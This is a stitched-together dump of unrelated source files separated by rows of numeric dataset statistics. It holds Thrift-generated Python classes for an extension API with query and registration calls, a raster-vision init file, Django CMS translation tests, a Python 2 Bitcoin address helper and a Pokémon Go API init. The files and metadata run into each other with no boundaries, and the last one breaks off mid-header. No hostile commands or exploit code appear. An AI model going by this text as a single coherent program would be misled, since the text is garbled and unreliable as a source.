iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('registerExtension_args')
if self.info is not None:
oprot.writeFieldBegin('info', TType.STRUCT, 1)
self.info.write(oprot)
oprot.writeFieldEnd()
if self.registry is not None:
oprot.writeFieldBegin('registry', TType.MAP, 2)
oprot.writeMapBegin(TType.STRING, TType.MAP, len(self.registry))
for kiter70, viter71 in self.registry.items():
oprot.writeString(kiter70.encode('utf-8') if sys.version_info[0] == 2 else kiter70)
oprot.writeMapBegin(TType.STRING, TType.LIST, len(viter71))
for kiter72, viter73 in viter71.items():
oprot.writeString(kiter72.encode('utf-8') if sys.version_info[0] == 2 else kiter72)
oprot.writeListBegin(TType.MAP, len(viter73))
for iter74 in viter73:
oprot.writeMapBegin(TType.STRING, TType.STRING, len(iter74))
for kiter75, viter76 in iter74.items():
oprot.writeString(kiter75.encode('utf-8') if sys.version_info[0] == 2 else kiter75)
oprot.writeString(viter76.encode('utf-8') if sys.version_info[0] == 2 else viter76)
oprot.writeMapEnd()
oprot.writeListEnd()
oprot.writeMapEnd()
oprot.writeMapEnd()
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class registerExtension_result(object):
"""
Attributes:
- success
"""
thrift_spec = (
(0, TType.STRUCT, 'success', (ExtensionStatus, ExtensionStatus.thrift_spec), None, ), # 0
)
def __init__(self, success=None,):
self.success = success
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.STRUCT:
self.success = ExtensionStatus()
self.success.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('registerExtension_result')
if self.success is not None:
oprot.writeFieldBegin('success', TType.STRUCT, 0)
self.success.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class deregisterExtension_args(object):
"""
Attributes:
- uuid
"""
thrift_spec = (
None, # 0
(1, TType.I64, 'uuid', None, None, ), # 1
)
def __init__(self, uuid=None,):
self.uuid = uuid
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.I64:
self.uuid = iprot.readI64()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('deregisterExtension_args')
if self.uuid is not None:
oprot.writeFieldBegin('uuid', TType.I64, 1)
oprot.writeI64(self.uuid)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class deregisterExtension_result(object):
"""
Attributes:
- success
"""
thrift_spec = (
(0, TType.STRUCT, 'success', (ExtensionStatus, ExtensionStatus.thrift_spec), None, ), # 0
)
def __init__(self, success=None,):
self.success = success
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.STRUCT:
self.success = ExtensionStatus()
self.success.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('deregisterExtension_result')
if self.success is not None:
oprot.writeFieldBegin('success', TType.STRUCT, 0)
self.success.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class query_args(object):
"""
Attributes:
- sql
"""
thrift_spec = (
None, # 0
(1, TType.STRING, 'sql', 'UTF8', None, ), # 1
)
def __init__(self, sql=None,):
self.sql = sql
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRING:
self.sql = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('query_args')
if self.sql is not None:
oprot.writeFieldBegin('sql', TType.STRING, 1)
oprot.writeString(self.sql.encode('utf-8') if sys.version_info[0] == 2 else self.sql)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class query_result(object):
"""
Attributes:
- success
"""
thrift_spec = (
(0, TType.STRUCT, 'success', (ExtensionResponse, ExtensionResponse.thrift_spec), None, ), # 0
)
def __init__(self, success=None,):
self.success = success
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.STRUCT:
self.success = ExtensionResponse()
self.success.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('query_result')
if self.success is not None:
oprot.writeFieldBegin('success', TType.STRUCT, 0)
self.success.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class getQueryColumns_args(object):
"""
Attributes:
- sql
"""
thrift_spec = (
None, # 0
(1, TType.STRING, 'sql', 'UTF8', None, ), # 1
)
def __init__(self, sql=None,):
self.sql = sql
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRING:
self.sql = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('getQueryColumns_args')
if self.sql is not None:
oprot.writeFieldBegin('sql', TType.STRING, 1)
oprot.writeString(self.sql.encode('utf-8') if sys.version_info[0] == 2 else self.sql)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class getQueryColumns_result(object):
"""
Attributes:
- success
"""
thrift_spec = (
(0, TType.STRUCT, 'success', (ExtensionResponse, ExtensionResponse.thrift_spec), None, ), # 0
)
def __init__(self, success=None,):
self.success = success
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.STRUCT:
self.success = ExtensionResponse()
self.success.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('getQueryColumns_result')
if self.success is not None:
oprot.writeFieldBegin('success', TType.STRUCT, 0)
self.success.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
| 35.111993
| 206
| 0.585931
| 4,032
| 39,817
| 5.542659
| 0.055556
| 0.02998
| 0.026177
| 0.012887
| 0.794344
| 0.764274
| 0.736755
| 0.723465
| 0.718275
| 0.718275
| 0
| 0.0106
| 0.310521
| 39,817
| 1,133
| 207
| 35.142983
| 0.803446
| 0.014994
| 0
| 0.776286
| 1
| 0
| 0.029247
| 0.003046
| 0
| 0
| 0
| 0
| 0
| 1
| 0.128635
| false
| 0.006711
| 0.008949
| 0.040268
| 0.263982
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
1d61ab9fba7efd5dfa88a7e441c5087a4284368c
| 326
|
py
|
Python
|
rastervision/v2/rv/data/label_source/__init__.py
|
carderne/raster-vision
|
915fbcd3263d8f2193e65c2cd0eb53e050a47a01
|
[
"Apache-2.0"
] | 1
|
2019-11-07T10:02:23.000Z
|
2019-11-07T10:02:23.000Z
|
rastervision/v2/rv/data/label_source/__init__.py
|
carderne/raster-vision
|
915fbcd3263d8f2193e65c2cd0eb53e050a47a01
|
[
"Apache-2.0"
] | null | null | null |
rastervision/v2/rv/data/label_source/__init__.py
|
carderne/raster-vision
|
915fbcd3263d8f2193e65c2cd0eb53e050a47a01
|
[
"Apache-2.0"
] | null | null | null |
# flake8: noqa
from rastervision.v2.rv.data.label_source.label_source import *
from rastervision.v2.rv.data.label_source.label_source_config import *
from rastervision.v2.rv.data.label_source.chip_classification_label_source import *
from rastervision.v2.rv.data.label_source.chip_classification_label_source_config import *
| 46.571429
| 90
| 0.858896
| 48
| 326
| 5.541667
| 0.270833
| 0.330827
| 0.270677
| 0.300752
| 0.894737
| 0.894737
| 0.894737
| 0.894737
| 0.894737
| 0.721805
| 0
| 0.01634
| 0.06135
| 326
| 6
| 91
| 54.333333
| 0.852941
| 0.03681
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 13
|
d55ba80178c16ae63abedf6657efe8885b2e98ad
| 11,368
|
py
|
Python
|
tests/providers/test_supertext.py
|
divio/djangocms-translations
|
9bfde2fed91973160bbe50ccbd6b4e2a2f4ba07f
|
[
"BSD-3-Clause"
] | 3
|
2019-01-14T13:30:38.000Z
|
2020-08-10T22:16:06.000Z
|
tests/providers/test_supertext.py
|
divio/djangocms-translations
|
9bfde2fed91973160bbe50ccbd6b4e2a2f4ba07f
|
[
"BSD-3-Clause"
] | 5
|
2018-12-20T13:56:47.000Z
|
2021-07-20T07:13:01.000Z
|
tests/providers/test_supertext.py
|
divio/djangocms-translations
|
9bfde2fed91973160bbe50ccbd6b4e2a2f4ba07f
|
[
"BSD-3-Clause"
] | null | null | null |
# -*- coding: utf-8 -*-
import json
from cms.api import add_plugin, create_page
from cms.test_utils.testcases import CMSTestCase
from djangocms_transfer.exporter import export_page
from djangocms_translations.providers.supertext import (
_get_translation_export_content, _set_translation_import_content,
)
class GetTranslationExportContentTestCase(CMSTestCase):
def setUp(self):
super(GetTranslationExportContentTestCase, self).setUp()
self.page = create_page('test page', 'test_page.html', 'en', published=True)
self.placeholder = self.page.placeholders.get(slot='content')
def _export_page(self):
return json.loads(export_page(self.page, 'en'))
def test_textfield_without_children(self):
raw_content = '<p>Please <a href="http://www.google.com">CLICK ON LINK1</a> to go to link1.</p>'
add_plugin(self.placeholder, 'DummyTextPlugin', 'en', body=raw_content)
plugin = self._export_page()[0]['plugins'][0]
result, children_included_in_this_content = _get_translation_export_content('body', plugin)
self.assertEquals(result, raw_content)
self.assertEquals(children_included_in_this_content, [])
def test_textfield_with_children(self):
parent = add_plugin(self.placeholder, 'DummyTextPlugin', 'en', body='')
child1 = add_plugin(self.placeholder, 'DummyLinkPlugin', 'en', target=parent, label='CLICK ON LINK1')
parent_body = (
'<p>Please <cms-plugin id="{}"></cms-plugin> to go to link1.</p>'
).format(child1.pk)
parent.body = parent_body
parent.save()
plugin = self._export_page()[0]['plugins'][0]
result, children_included_in_this_content = _get_translation_export_content('body', plugin)
expected = (
parent_body
.replace('></cms-plugin>', '>CLICK ON LINK1</cms-plugin>', 1)
)
self.assertEquals(result, expected)
self.assertEquals(children_included_in_this_content, [child1.pk])
def test_textfield_with_multiple_children(self):
parent = add_plugin(self.placeholder, 'DummyTextPlugin', 'en', body='')
child1 = add_plugin(self.placeholder, 'DummyLinkPlugin', 'en', target=parent, label='CLICK ON LINK1')
child2 = add_plugin(self.placeholder, 'DummyLinkPlugin', 'en', target=parent, label='CLICK ON LINK2')
parent_body = (
'<p>Please <cms-plugin id="{}"></cms-plugin> to go to link1 '
'or <cms-plugin id="{}"></cms-plugin> to go to link2.</p>'
).format(child1.pk, child2.pk)
parent.body = parent_body
parent.save()
plugin = self._export_page()[0]['plugins'][0]
result, children_included_in_this_content = _get_translation_export_content('body', plugin)
expected = (
parent_body
.replace('></cms-plugin>', '>CLICK ON LINK1</cms-plugin>', 1)
.replace('></cms-plugin>', '>CLICK ON LINK2</cms-plugin>', 1)
)
self.assertEquals(result, expected)
self.assertEquals(children_included_in_this_content, [child1.pk, child2.pk])
def test_textfield_with_multiple_children_one_deleted(self):
parent = add_plugin(self.placeholder, 'DummyTextPlugin', 'en', body='')
child1 = add_plugin(self.placeholder, 'DummyLinkPlugin', 'en', target=parent, label='CLICK ON LINK1')
child2 = add_plugin(self.placeholder, 'DummyLinkPlugin', 'en', target=parent, label='CLICK ON LINK2')
parent_body = (
'<p>Please <cms-plugin id="{}"></cms-plugin> to go to link1 '
'or <cms-plugin id="{}"></cms-plugin> to go to link2.</p>'
).format(child1.pk, child2.pk)
parent.body = parent_body
parent.save()
plugin = self._export_page()[0]['plugins'][0]
child1.delete()
result, children_included_in_this_content = _get_translation_export_content('body', plugin)
expected = (
'<p>Please to go to link1 '
'or <cms-plugin id="{}">CLICK ON LINK2</cms-plugin> to go to link2.</p>'
).format(child2.pk)
self.assertEquals(result, expected)
self.assertEquals(children_included_in_this_content, [child2.pk])
def test_dummy_textfield2_with_children(self):
''' DummyText2Plugin implementation defines get_translation_export_content with a simple str return. '''
parent = add_plugin(self.placeholder, 'DummyText2Plugin', 'en', body='')
child1 = add_plugin(self.placeholder, 'DummyLinkPlugin', 'en', target=parent, label='CLICK ON LINK1')
parent_body = (
'<p>Please <cms-pluginid="{}"></cms-plugin> to go to link1.</p>'
).format(child1.pk)
parent.body = parent_body
parent.save()
plugin = self._export_page()[0]['plugins'][0]
result, children_included_in_this_content = _get_translation_export_content('body', plugin)
self.assertEquals(result, 'super dummy overwritten content')
self.assertEquals(children_included_in_this_content, [])
def test_dummy_textfield3_with_children(self):
''' DummyText3Plugin implementation does not define get_translation_export_content. '''
parent = add_plugin(self.placeholder, 'DummyText3Plugin', 'en', body='')
child1 = add_plugin(self.placeholder, 'DummyLinkPlugin', 'en', target=parent, label='CLICK ON LINK1')
parent_body = (
'<p>Please <cms-plugin id="{}"></cms-plugin> to go to link1.</p>'
).format(child1.pk)
parent.body = parent_body
parent.save()
plugin = self._export_page()[0]['plugins'][0]
result, children_included_in_this_content = _get_translation_export_content('body', plugin)
self.assertEquals(result, parent.body)
self.assertEquals(children_included_in_this_content, [])
def test_textfield_with_children_non_translatable(self):
parent = add_plugin(self.placeholder, 'DummyTextPlugin', 'en', body='')
child1 = add_plugin(self.placeholder, 'DummySpacerPlugin', 'en', target=parent)
parent_body = (
'<p>This is cool <cms-plugin id="{}"></cms-plugin> this is nice.</p>'
).format(child1.pk)
parent.body = parent_body
parent.save()
plugin = self._export_page()[0]['plugins'][0]
result, children_included_in_this_content = _get_translation_export_content('body', plugin)
expected = (
parent_body
)
self.assertEquals(result, expected)
self.assertEquals(children_included_in_this_content, [child1.pk])
class SetTranslationImportContentTestCase(CMSTestCase):
def setUp(self):
super(SetTranslationImportContentTestCase, self).setUp()
self.page = create_page('test page', 'test_page.html', 'en', published=True)
self.placeholder = self.page.placeholders.get(slot='content')
def _export_page(self):
return json.loads(export_page(self.page, 'en'))
def test_textfield_without_children(self):
raw_content = '<p>Please <a href="http://www.google.com">CLICK ON LINK1</a> to go to link1.</p>'
add_plugin(self.placeholder, 'DummyTextPlugin', 'en', body=raw_content)
plugin = self._export_page()[0]['plugins'][0]
result = _set_translation_import_content(_get_translation_export_content('body', plugin)[0], plugin)
self.assertDictEqual(result, {})
def test_textfield_with_children(self):
parent = add_plugin(self.placeholder, 'DummyTextPlugin', 'en', body='')
child1 = add_plugin(self.placeholder, 'DummyLinkPlugin', 'en', target=parent, label='CLICK ON LINK1')
parent_body = (
'<p>Please <cms-plugin id="{}"></cms-plugin> to go to link1.</p>'
).format(child1.pk)
parent.body = parent_body
parent.save()
plugin = self._export_page()[0]['plugins'][0]
result = _set_translation_import_content(_get_translation_export_content('body', plugin)[0], plugin)
self.assertDictEqual(result, {child1.pk: 'CLICK ON LINK1'})
def test_textfield_with_multiple_children(self):
parent = add_plugin(self.placeholder, 'DummyTextPlugin', 'en', body='')
child1 = add_plugin(self.placeholder, 'DummyLinkPlugin', 'en', target=parent, label='CLICK ON LINK1')
child2 = add_plugin(self.placeholder, 'DummyLinkPlugin', 'en', target=parent, label='CLICK ON LINK2')
parent_body = (
'<p>Please <cms-plugin id="{}"></cms-plugin> to go to link1 '
'or <cms-plugin id="{}"></cms-plugin> to go to link2.</p>'
).format(child1.pk, child2.pk)
parent.body = parent_body
parent.save()
plugin = self._export_page()[0]['plugins'][0]
result = _set_translation_import_content(_get_translation_export_content('body', plugin)[0], plugin)
self.assertDictEqual(result, {child1.pk: 'CLICK ON LINK1', child2.pk: 'CLICK ON LINK2'})
def test_textfield_with_multiple_children_one_deleted(self):
parent = add_plugin(self.placeholder, 'DummyTextPlugin', 'en', body='')
child1 = add_plugin(self.placeholder, 'DummyLinkPlugin', 'en', target=parent, label='CLICK ON LINK1')
child2 = add_plugin(self.placeholder, 'DummyLinkPlugin', 'en', target=parent, label='CLICK ON LINK2')
parent_body = (
'<p>Please <cms-plugin id="{}"></cms-plugin> to go to link1 '
'or <cms-plugin id="{}"></cms-plugin> to go to link2.</p>'
).format(child1.pk, child2.pk)
parent.body = parent_body
parent.save()
plugin = self._export_page()[0]['plugins'][0]
child1.delete()
result = _set_translation_import_content(_get_translation_export_content('body', plugin)[0], plugin)
self.assertDictEqual(result, {child2.pk: 'CLICK ON LINK2'})
def test_dummy_textfield2_with_children(self):
''' DummyText2Plugin implementation defines get_translation_export_content with a simple str return. '''
parent = add_plugin(self.placeholder, 'DummyText2Plugin', 'en', body='')
child1 = add_plugin(self.placeholder, 'DummyLinkPlugin', 'en', target=parent, label='CLICK ON LINK1')
parent_body = (
'<p>Please <cms-plugin id="{}"></cms-plugin> to go to link1.</p>'
).format(child1.pk)
parent.body = parent_body
parent.save()
plugin = self._export_page()[0]['plugins'][0]
result = _set_translation_import_content(_get_translation_export_content('body', plugin)[0], plugin)
self.assertDictEqual(result, {42: 'because I want this to be id=42'})
def test_dummy_textfield3_with_children(self):
''' DummyText3Plugin implementation does not define get_translation_export_content. '''
parent = add_plugin(self.placeholder, 'DummyText3Plugin', 'en', body='')
child1 = add_plugin(self.placeholder, 'DummyLinkPlugin', 'en', target=parent, label='CLICK ON LINK1')
parent_body = (
'<p>Please <cms-plugin id="{}"></cms-plugin> to go to link1.</p>'
).format(child1.pk)
parent.body = parent_body
parent.save()
plugin = self._export_page()[0]['plugins'][0]
result = _set_translation_import_content(_get_translation_export_content('body', plugin)[0], plugin)
self.assertDictEqual(result, {})
| 46.4
| 112
| 0.658427
| 1,351
| 11,368
| 5.314582
| 0.085122
| 0.069638
| 0.050696
| 0.093593
| 0.920752
| 0.904596
| 0.904596
| 0.898747
| 0.891643
| 0.891643
| 0
| 0.015028
| 0.203906
| 11,368
| 244
| 113
| 46.590164
| 0.778343
| 0.033427
| 0
| 0.839572
| 0
| 0.048128
| 0.209158
| 0.029736
| 0
| 0
| 0
| 0
| 0.106952
| 1
| 0.090909
| false
| 0
| 0.074866
| 0.010695
| 0.187166
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d56e395b96f53ab2dd033be4883ecfb2e4dc9833
| 1,964
|
py
|
Python
|
src/helper_bitcoin.py
|
coffeedogs/PyBitmessage
|
634a49cd6d8fc2f52504586be4c4766340641b25
|
[
"MIT"
] | 5
|
2015-01-28T04:45:09.000Z
|
2017-08-08T10:59:06.000Z
|
BitmessageKit/Vendor/pybitmessage/helper_bitcoin.py
|
VoluntaryLabs/BitmessageKit
|
dd634977a629ab4dec184e12bb6324cc01149ba3
|
[
"MIT"
] | 4
|
2019-11-30T14:01:12.000Z
|
2020-01-03T13:20:57.000Z
|
BitmessageKit/Vendor/pybitmessage/helper_bitcoin.py
|
VoluntaryLabs/BitmessageKit
|
dd634977a629ab4dec184e12bb6324cc01149ba3
|
[
"MIT"
] | 3
|
2016-01-11T12:36:31.000Z
|
2021-02-12T19:36:44.000Z
|
import hashlib
from pyelliptic import arithmetic
# This function expects that pubkey begin with \x04
def calculateBitcoinAddressFromPubkey(pubkey):
if len(pubkey) != 65:
print 'Could not calculate Bitcoin address from pubkey because function was passed a pubkey that was', len(pubkey), 'bytes long rather than 65.'
return "error"
ripe = hashlib.new('ripemd160')
sha = hashlib.new('sha256')
sha.update(pubkey)
ripe.update(sha.digest())
ripeWithProdnetPrefix = '\x00' + ripe.digest()
checksum = hashlib.sha256(hashlib.sha256(
ripeWithProdnetPrefix).digest()).digest()[:4]
binaryBitcoinAddress = ripeWithProdnetPrefix + checksum
numberOfZeroBytesOnBinaryBitcoinAddress = 0
while binaryBitcoinAddress[0] == '\x00':
numberOfZeroBytesOnBinaryBitcoinAddress += 1
binaryBitcoinAddress = binaryBitcoinAddress[1:]
base58encoded = arithmetic.changebase(binaryBitcoinAddress, 256, 58)
return "1" * numberOfZeroBytesOnBinaryBitcoinAddress + base58encoded
def calculateTestnetAddressFromPubkey(pubkey):
if len(pubkey) != 65:
print 'Could not calculate Bitcoin address from pubkey because function was passed a pubkey that was', len(pubkey), 'bytes long rather than 65.'
return "error"
ripe = hashlib.new('ripemd160')
sha = hashlib.new('sha256')
sha.update(pubkey)
ripe.update(sha.digest())
ripeWithProdnetPrefix = '\x6F' + ripe.digest()
checksum = hashlib.sha256(hashlib.sha256(
ripeWithProdnetPrefix).digest()).digest()[:4]
binaryBitcoinAddress = ripeWithProdnetPrefix + checksum
numberOfZeroBytesOnBinaryBitcoinAddress = 0
while binaryBitcoinAddress[0] == '\x00':
numberOfZeroBytesOnBinaryBitcoinAddress += 1
binaryBitcoinAddress = binaryBitcoinAddress[1:]
base58encoded = arithmetic.changebase(binaryBitcoinAddress, 256, 58)
return "1" * numberOfZeroBytesOnBinaryBitcoinAddress + base58encoded
| 43.644444
| 152
| 0.729124
| 182
| 1,964
| 7.868132
| 0.307692
| 0.02514
| 0.015363
| 0.023743
| 0.886872
| 0.886872
| 0.886872
| 0.886872
| 0.886872
| 0.886872
| 0
| 0.043936
| 0.177189
| 1,964
| 44
| 153
| 44.636364
| 0.842203
| 0.024949
| 0
| 0.842105
| 0
| 0
| 0.154731
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0.052632
| 0.052632
| null | null | 0.052632
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 9
|
d58bfd0aeafa7bf026d16155b6d31fd4e8a49ef3
| 105
|
py
|
Python
|
pogom/pgoapi/__init__.py
|
jskoizumi/pkgohi
|
619748338587e0201f303b653ce9c04694653385
|
[
"MIT"
] | 6
|
2016-07-21T20:23:29.000Z
|
2016-10-14T16:50:21.000Z
|
pogom/pgoapi/__init__.py
|
jskoizumi/pkgohi
|
619748338587e0201f303b653ce9c04694653385
|
[
"MIT"
] | 4
|
2016-07-21T20:39:19.000Z
|
2016-07-25T13:51:41.000Z
|
pogom/pgoapi/__init__.py
|
jskoizumi/pkgohi
|
619748338587e0201f303b653ce9c04694653385
|
[
"MIT"
] | null | null | null |
from pgoapi import *
import requests.packages.urllib3
requests.packages.urllib3.disable_warnings()
| 21
| 44
| 0.8
| 12
| 105
| 6.916667
| 0.666667
| 0.385542
| 0.554217
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.021739
| 0.12381
| 105
| 5
| 44
| 21
| 0.880435
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.666667
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
d59da3f6088790bcf831703d1fe1571d16568ca1
| 237
|
py
|
Python
|
myPackageAna/__init__.py
|
anajikadam17/myPackageAna
|
61bffd28c6b87240363bf2d42020852cd25e3cf6
|
[
"MIT"
] | null | null | null |
myPackageAna/__init__.py
|
anajikadam17/myPackageAna
|
61bffd28c6b87240363bf2d42020852cd25e3cf6
|
[
"MIT"
] | null | null | null |
myPackageAna/__init__.py
|
anajikadam17/myPackageAna
|
61bffd28c6b87240363bf2d42020852cd25e3cf6
